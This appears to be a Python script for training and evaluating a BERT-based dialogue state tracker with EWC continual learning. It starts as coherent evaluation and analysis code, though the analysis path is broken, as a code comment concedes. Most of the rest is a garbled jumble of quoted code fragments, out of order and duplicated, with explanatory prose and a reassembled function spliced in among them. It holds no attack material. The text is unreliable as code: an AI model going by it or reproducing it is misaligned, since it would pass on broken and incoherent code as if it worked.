        logger.info("***** Running evaluation *****")
        logger.info("  Num examples = %d", len(eval_examples))
        logger.info("  Batch size = %d", args.eval_batch_size)

        eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)
        # Run prediction for full data
        eval_sampler = SequentialSampler(eval_data)
        eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size)

        model.eval()
        eval_loss, eval_accuracy = 0, 0
        eval_loss_slot, eval_acc_slot = None, None
        nb_eval_steps, nb_eval_examples = 0, 0
        prev_eval_loss, prev_eval_accuracy = 0, 0
        prev_eval_loss_slot, prev_eval_acc_slot = None, None
        nb_eval_examples_prev = 0

        def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot,
                          loss, loss_slot, acc, acc_slot, nb_eval_ex):
            eval_loss += loss.item() * nb_eval_ex
            eval_accuracy += acc.item() * nb_eval_ex
            if loss_slot is not None:
                if eval_loss_slot is None:
                    eval_loss_slot = [l * nb_eval_ex for l in loss_slot]
                else:
                    for i, l in enumerate(loss_slot):
                        eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex
            if eval_acc_slot is None:
                eval_acc_slot = acc_slot * nb_eval_ex
            else:
                eval_acc_slot += acc_slot * nb_eval_ex
            return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot

        for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc="Evaluating"):
            if input_ids.dim() == 2:
                input_ids = input_ids.unsqueeze(0)
                input_len = input_len.unsqueeze(0)
                label_ids = label_ids.unsqueeze(0)
                prev_label_ids = prev_label_ids.unsqueeze(0)

            with torch.no_grad():
                if n_gpu == 1:
                    loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                              target_slot=target_slot_id)
                    prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = \
                        model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                else:
                    loss, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                      target_slot=target_slot_id)
                    prev_loss, _, prev_acc, prev_acc_slot, _ = \
                        model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                    loss_slot, prev_loss_slot = None, None
                    loss = loss.mean()
                    acc = acc.mean()
                    acc_slot = acc_slot.mean(0)
                    prev_loss = prev_loss.mean()
                    prev_acc = prev_acc.mean()
                    prev_acc_slot = prev_acc_slot.mean(0)

            nb_eval_ex_prev = (prev_label_ids[:, :, 0].view(-1) != -1).sum().item()
            nb_eval_examples_prev += nb_eval_ex_prev
            nb_eval_ex = (label_ids[:, :, 0].view(-1) != -1).sum().item()
            nb_eval_examples += nb_eval_ex
            nb_eval_steps += 1

            eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \
                _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot,
                              loss, loss_slot, acc, acc_slot, nb_eval_ex)
            prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \
                _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot,
                              prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev)

        eval_loss = eval_loss / nb_eval_examples
        eval_accuracy = eval_accuracy / nb_eval_examples
        prev_eval_loss = prev_eval_loss / nb_eval_examples_prev
        prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev
        eval_acc_slot = eval_acc_slot / nb_eval_examples
        prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev

        total_acc_slot = {}
        for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id + prev_slot_id)):
            total_acc_slot[idx] = val
        total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0))

        loss = tr_loss / nb_tr_steps if args.do_train else None

        result = {'eval_loss': eval_loss,
                  'eval_accuracy': eval_accuracy,
                  'loss': loss,
                  'eval_loss_slot': '\t'.join([str(val / nb_eval_examples) for val in eval_loss_slot]),
                  'eval_acc_slot': '\t'.join([str((val).item()) for val in eval_acc_slot]),
                  'prev_eval_loss': prev_eval_loss,
                  'prev_eval_accuracy': prev_eval_accuracy,
                  'prev_eval_loss_slot': '\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]),
                  'prev_eval_acc_slot': '\t'.join([str((val).item()) for val in prev_eval_acc_slot]),
                  'total_acc_slot': '\t'.join([str(val[1].item()) for val in total_acc_slot])}

        out_file_name = 'eval_results'
        if args.target_slot == 'all':
            out_file_name += '_all'
        output_eval_file = os.path.join(args.output_dir, "%s.txt" % out_file_name)
        with open(output_eval_file, "w") as writer:
            logger.info("***** Eval results *****")
            for key in sorted(result.keys()):
                logger.info("  %s = %s", key, str(result[key]))
                writer.write("%s = %s\n" % (key, str(result[key])))

    ###########################################################################
    # Analyze: TODO
    ###########################################################################

    if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
        def draw(data, x, y, ax):
            seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y,
                            vmin=0.0, vmax=1.0, cbar=False, ax=ax)

        eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation)
        # NOTE: this analysis path still assumes the single-task feature signature.
        all_input_ids, all_input_len, all_label_ids = convert_examples_to_features(
            eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length)
        all_input_ids, all_input_len, all_label_ids = \
            all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device)
        logger.info("***** Running analysis *****")
        logger.info("  Num examples = %d", len(eval_examples))
        logger.info("  Batch size = %d", 1)

        eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids)
        # Run prediction for full data
        eval_sampler = SequentialSampler(eval_data)
        eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1)

        model.eval()

        none_value_id = [len(val) - 1 for val in label_list]
        incorrect_dialogs = []
        attention_draw = 5
        class_correct = [[0 for _ in range(num_labels[i])] for i in range(len(num_labels))]
        class_count = [[0 for _ in range(num_labels[i])] for i in range(len(num_labels))]

        for input_ids, input_len, label_ids in tqdm(eval_dataloader, desc="Evaluating"):
            if input_ids.dim() == 2:
                input_ids = input_ids.unsqueeze(0)
                input_len = input_len.unsqueeze(0)
                label_ids = label_ids.unsqueeze(0)

            with torch.no_grad():
                _, _, acc, _, pred_slot = model(input_ids, input_len, label_ids, 1)

            nturn = (label_ids[:, :, 0].view(-1) != -1).sum().item()
            nslot = label_ids.size(2)
            for slot in range(nslot):
                for turn in range(nturn):
                    class_count[slot][label_ids[0][turn][slot]] += 1
                    if label_ids[0][turn][slot] == pred_slot[0][turn][slot]:
                        class_correct[slot][label_ids[0][turn][slot]] += 1

            drawfig = False
            if drawfig:
                # if len(incorrect_dialogs) < attention_draw:
                max_len = input_ids.size(2)
                attn_scores = model.attn.get_scores().transpose(1, 2).contiguous() \
                                   .view(label_ids.size(1) * nslot, -1, max_len)
                for slot in range(0, nslot):
                    fig, axs = plt.subplots(nturn, 1, figsize=(50, 10 * nturn))
                    for turn in range(nturn):
                        draw(attn_scores[slot * label_ids.size(1) + turn, :, :].cpu(),
                             tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()),
                             [*range(0, args.attn_head)], ax=axs[turn])
                        axs[turn].set_title("turn %d slot: %s label: %s pred: %s"
                                            % (turn, processor.target_slot[slot],
                                               str(label_list[slot][label_ids[0][turn][slot].item()]),
                                               str(label_list[slot][pred_slot[0][turn][slot].item()])))
                    plt.show()
                    plt.savefig(os.path.join(args.output_dir,
                                             "attention-d%d-slot%s.png" % (len(incorrect_dialogs), slot)))
                    plt.close()

            if not acc == 1:
                dialog = []
                for input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]):
                    text = {}
                    text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '')
                    text['label'] = [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())]
                    text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())]
                    dialog.append(text)
                incorrect_dialogs.append(dialog)

        output_eval_incorr_file = os.path.join(args.output_dir, "incorrect_dialog.txt")
        with open(output_eval_incorr_file, "w") as writer:
            for dialog in incorrect_dialogs:
                for turn in dialog:
                    text = turn['input'] + '\t'
                    for label, pred in zip(turn['label'], turn['pred']):
                        text += '%s\t%s\t' % (label, pred)
                    writer.write("%s\n" % text)
                writer.write("---------- \n")
        logger.info("Done analysis: %s" % output_eval_incorr_file)

        output_eval_incorr_file = os.path.join(args.output_dir, "per_class_accuracy.txt")
        with open(output_eval_incorr_file, "w") as writer:
            total_class_acc = 0
            total_slot_class_acc = []
            nlabels = 0
            for sid, slot in enumerate(class_count):
                slot_class_acc = 0
                for vid, value in enumerate(slot):
                    if not value == 0:
                        class_acc = class_correct[sid][vid] / value
                        writer.write("%s\t%d\t%d\t%.3f\n"
                                     % (label_list[sid][vid], class_correct[sid][vid], value, class_acc))
                        slot_class_acc += class_acc
                        nlabels += 1
                    else:
                        writer.write("%s\t%d\t%d\t%.3f\n"
                                     % (label_list[sid][vid], class_correct[sid][vid], value, -1))
                total_slot_class_acc.append(slot_class_acc / (vid + 1))
                total_class_acc += slot_class_acc
            total_class_acc /= nlabels

            for sid, slot_acc in enumerate(total_slot_class_acc):
                writer.write("%d\t%.3f\n" % (sid, slot_acc))
            writer.write("total class accuracy \t%.3f\n" % total_class_acc)
        logger.info("Done analysis: %s" % output_eval_incorr_file)
torch.cuda.manual_seed_all(args.seed) if not args.do_train and not args.do_eval and not args.do_analyze: raise ValueError(\"At", "'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type", "eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([", "return 1.0 - x ############################################################################### # Main ############################################################################### def main(): parser = argparse.ArgumentParser()", "class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel') print(label_ids[0, 0:10,", "model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps = 0, 0 for step, batch in", "l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot", "parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA", "NotImplementedError() # sorting the ontology according to the alphabetic order of the slots", "-> nbt, rename_list.append(key) for key in del_list: del ptr_model[key] for key in rename_list:", "self.ontology[slot] for slot in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot]", "directory of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of", "eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot is None: eval_acc_slot = acc_slot *", "= text_b self.label = label # Target slots in this training task self.prev_label", "for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for t in batch)", "out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as", "== -1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x, y, ax): seaborn.heatmap(data,", "'_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"*****", ")) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc == 1: dialog =", "rnn -> nbt, rename_list.append(key) for key in del_list: del ptr_model[key] for key in", "import numpy as np import torch from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler", "label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id = %d) ' % (label,", "/ args.dev_batch_size * args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples,", "tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model) if not os.path.exists(vocab_dir): raise ValueError(\"Can't find", "perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to allow no further improvement.\")", "= 0 for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, 
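The fragments contain `get_label_embedding` nearly verbatim; reassembled here with comments added (the function body is taken from the fragments, only the docstring and comments are new):

```python
import torch

def get_label_embedding(labels, max_seq_length, tokenizer, device):
    """Encode each candidate slot value as "[CLS] value [SEP]" token ids."""
    features = []
    for label in labels:
        label_tokens = ["[CLS]"] + tokenizer.tokenize(label) + ["[SEP]"]
        label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens)
        label_len = len(label_token_ids)
        # Zero-pad every value to the same length so they stack into one tensor.
        label_token_ids += [0] * (max_seq_length - len(label_token_ids))
        assert len(label_token_ids) == max_seq_length
        features.append((label_token_ids, label_len))
    all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device)
    all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device)
    return all_label_token_ids, all_label_len
```

The resulting `(token_ids, lengths)` pairs for value labels and slot names are passed to `model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len)` to build the tracker's lookup tables.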
desc=\"Evaluating\"): if input_ids.dim() ==", "raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size", "help=\"Whether to run eval on the test set.\") args = parser.parse_args() if os.path.exists(args.output_dir)", "slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu", "and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden", "default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns zero\")", "if ('rnn.' in key): # rename rnn -> nbt, rename_list.append(key) for key in", "of `InputExample`s for the dev set.\"\"\" raise NotImplementedError() def get_labels(self): \"\"\"Gets the list", "dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot):", "the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of the task", "if n_gpu > 1: model = model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device)", "= SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [ len(val)-1 for", "num_train_steps = None accumulation = False if args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples", "def get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.prev_slot] def", "except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use distributed and", "prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for i, l in enumerate(loss_slot): dev_loss_slot[i] =", "round(dev_loss, 6) if last_update is None or dev_loss < best_loss: # Save a", "None or dev_loss < best_loss: # Save a trained model output_model_file = os.path.join(args.output_dir,", "[0] * (max_seq_length - len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids,", "Batch size = %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction", "will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str,", "n, p in param_optimizer if not any(nd in n for nd in no_decay)],", "None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) # CUDA setting if args.local_rank ==", "if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format(", "FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion,", "prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = 
(prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev", "up BERT uses lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer", "prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot", "def draw(data, x, y, ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax)", "get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\" raise NotImplementedError()", "prev_slot_dim = len(prev_label_list) def _hard_coding_label(label): return 'do not care' if label=='dontcare' else label", "nb_eval_examples if eval_loss_slot is None: # for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot =", "idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot +", "all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features = [] for label in labels:", "= os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer: for dialog in incorrect_dialogs: for", "+ present target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids,", "slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'),", "tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, prev_label_ids = batch if input_ids.dim()", "f: reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines = [] for line in reader:", "self.label_id = label_id self.prev_label_id = prev_label_id # trained slots in previous tasks class", "/ nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\",", "%s\" % \" \".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x)", "prev_label = [ line[4+idx] for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label,", "['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p for n, p in param_optimizer", "print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs)", "\"\"\"A single training/test example for simple sequence classification.\"\"\" def __init__(self, guid, text_a, text_b=None,", "attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval", "!= -1: t_total = t_total // torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers import", "sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum", "'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p for n, p in param_optimizer if any(nd", "enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) 
incorrect_dialogs.append(dialog) output_eval_incorr_file =", "prev_turn_idx - 1) assert len(features) % max_turn_length == 0 if prev_dialogue_idx is None", "list of labels for this data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file,", "Batch size = %d\", args.train_batch_size) logger.info(\" Num steps = %d\", num_train_steps) all_input_ids, all_input_len,", "all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev,", "device, n_gpu, bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps", "= int(len(train_examples) / args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs)", "BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type should be either rnn or transformer')", "'eval_acc_slot':'\\t'.join([ str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val /", "guid self.text_a = text_a self.text_b = text_b self.label = label # Target slots", "encoding='utf-8') as f: reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines = [] for line", "torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes the", "0 for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2:", "loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu == 1: for i, slot in", "labels in label_list] for i, label in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info", "in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id = %d) '", "= ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError() # sorting the ontology according", "of data.\"\"\" def __init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids = input_ids self.input_len =", "in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in", "features of data.\"\"\" def __init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids = input_ids self.input_len", "slot in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology", "return x / warmup return 1.0 - x ############################################################################### # Main ############################################################################### def", "of training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to", "raise ValueError(\"At least one of `do_train` or `do_eval` must be True.\") ############################################################################### #", "for l in loss_slot] else: for i, l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i]", "label_ids, prev_label_ids = batch if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len =", 
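A minimal self-contained sketch of the dialogue padding and reshape, under simplifying assumptions: the function name `pad_and_reshape` is hypothetical, and one label per turn is assumed for brevity (the original carries one label per slot per turn):

```python
import torch

def pad_and_reshape(dialogues, labels, max_turn_length, max_seq_length):
    # dialogues: list of dialogues, each a list of per-turn token-id lists
    # (already padded to max_seq_length); labels: matching per-turn label ids.
    flat_inputs, flat_labels = [], []
    for turns, turn_labels in zip(dialogues, labels):
        assert len(turns) <= max_turn_length
        n_pad = max_turn_length - len(turns)
        # Padding turns are all zeros; label id -1 marks them as invalid so
        # downstream code can count valid turns with (label_ids != -1).
        flat_inputs.extend(turns + [[0] * max_seq_length] * n_pad)
        flat_labels.extend(turn_labels + [-1] * n_pad)
    all_input_ids = torch.tensor(flat_inputs, dtype=torch.long)
    all_label_ids = torch.tensor(flat_labels, dtype=torch.long)
    # Reshape flat [dialogues * turns, seq] -> [dialogues, turns, seq].
    return (all_input_ids.view(-1, max_turn_length, max_seq_length),
            all_label_ids.view(-1, max_turn_length))
```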
"prev_num_valid_turn else: for i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l *", "input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ + args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot,", "of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns zero\") parser.add_argument('--skip_connect', type=str,", "acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc", "= line[3] + \" # \" + text_b else: text_a = line[2] #", "class_count = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))] eval_examples =", "# in the case that slot and values are different between the training", "training on gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1,", "dev_loss best_acc = dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\"", "= None, None nb_eval_examples_prev = 0 for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader,", "% args.gradient_accumulation_steps == 0: # modify learning rate with special warm up BERT", "features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1]", "for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn prev_dev_acc_slot", "processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs)", "if ('slot_lookup' in key) or ('value_lookup' in key): # remove slot_lookup and value_lookup", "= prev_label # trained slots in previous tasks class InputFeatures(object): \"\"\"A single set", "= prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1,", "be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input sequence length after WordPiece", "belief tracking dataset (GLUE version).\"\"\" def __init__(self, config): super(Processor, self).__init__() import json if", "i in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples,", "label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings ## Note: slot embeddings are ordered as", "empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if", "size = %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) # Run prediction", "self).__init__() import json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"),", "[ l * nb_eval_ex for l in loss_slot] else: for i, l in", "(len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for", "slot_len) if 
args.local_rank != -1: try: from apex.parallel import DistributedDataParallel as DDP except", "n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples,", "for x in range(num_labels[i])] for i in range(len(num_labels))] class_count = [[0 for x", "parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling to improve fp16 numeric stability. Only used when", "[x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b =", "DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization", "Load pretrained model # in the case that slot and values are different", "warmup=0.002): if x < warmup: return x / warmup return 1.0 - x", "\"pytorch_model.bin\") # Load a trained model that you have fine-tuned ptr_model = torch.load(output_model_file,", "input turn length. \\n\" \"Sequences longer than this will be truncated, and sequences", "eval_acc_slot = None, None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy = 0,", "lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer is not None:", "+=1 drawfig = False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10,", "ptr_model = torch.load(args.load_path, map_location=device) del_list = [] rename_list = [] for key in", "args.local_rank != -1: try: from apex.parallel import DistributedDataParallel as DDP except ImportError: raise", "for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: # Account for", "from apex.optimizers import FusedAdam except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex", "excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn',", "% slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step) tr_loss +=", "examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids,", "[] nlabels = 0 for sid, slot in enumerate(class_count): slot_class_acc = 0 for", "label_info = '' label_map = [{_label: i for i, _label in enumerate(labels)} for", "features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len", "self.guid = guid self.text_a = text_a self.text_b = text_b self.label = label #", "help=\"set 